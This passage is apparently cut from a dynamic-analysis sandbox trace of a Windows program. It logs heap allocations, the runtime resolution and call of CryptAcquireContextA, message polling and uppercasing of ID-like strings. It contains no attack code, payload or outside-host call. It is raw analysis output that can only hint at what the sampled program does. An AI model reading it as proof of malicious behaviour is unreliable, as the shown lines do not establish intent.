dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0198.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0198.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0198.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.311] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0198.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b36c0 [0198.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0198.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466e10 [0198.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0198.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.312] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0198.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0198.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0198.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0198.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0198.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.313] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6480) returned 1 [0198.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0198.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0198.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0198.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0198.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0198.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0198.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0198.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0198.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0198.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0198.318] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0198.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0198.319] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.319] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0198.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.320] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0198.321] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0198.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0198.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0198.321] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0198.321] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0198.322] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.322] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.322] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0198.323] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 